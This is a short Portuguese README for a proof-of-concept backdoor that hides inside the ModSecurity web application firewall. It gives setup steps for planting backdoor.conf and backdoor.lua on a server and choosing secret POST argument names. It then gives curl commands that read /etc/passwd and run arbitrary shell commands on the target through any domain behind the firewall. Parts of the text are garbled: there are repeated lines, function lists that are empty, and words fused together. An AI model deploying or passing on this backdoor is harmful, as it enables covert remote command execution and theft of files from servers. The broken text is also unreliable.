
Isto é uma prova de conceito de software malicioso executando dentro do ModSecurity WAF.
Esta é uma prova de conceito de software malicioso executando dentro do ModSecurity WAF.
O software tem duas funções principais:
Além disso, inclui estas funções:
SecStreamOutBodyInspection e SecContentInjection
definidas como OnObtenha os arquivos backdoor.conf e e carregue o primeiro no
servidor web.
backdoor.luaA configuração pode ser feita na primeira regra do arquivo backdoor.conf.
Esta configuração pode ser usada para definir o nome do argumento POST usado para
recuperar o conteúdo de arquivos. Defina-o para algo aleatório como koomem6Shmog.
Esta configuração pode ser usada para definir o nome do argumento POST usado para
executar comandos. Defina-o para algo aleatório como tys4Olhuibves.
Os comandos podem ser executados em qualquer endereço (domínio) no servidor de destino que esteja atrás do ModSecurity WAF. A saída dos comandos é anexada à resposta padrão do servidor.
Recuperando o conteúdo de arquivo:
curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"
Executando comando e obtendo saída:
curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"
Copyright (c) 2022 Jozef Sudolsky. Todos os direitos reservados.
"A LICENÇA BEER-WARE" (Revisão 42): [email protected] escreveu este arquivo. Enquanto você mantiver este aviso, pode fazer o que quiser com este material. Se nos encontrarmos algum dia, e você achar que este material vale a pena, você pode me comprar uma cerveja em troca. Jozef Sudolsky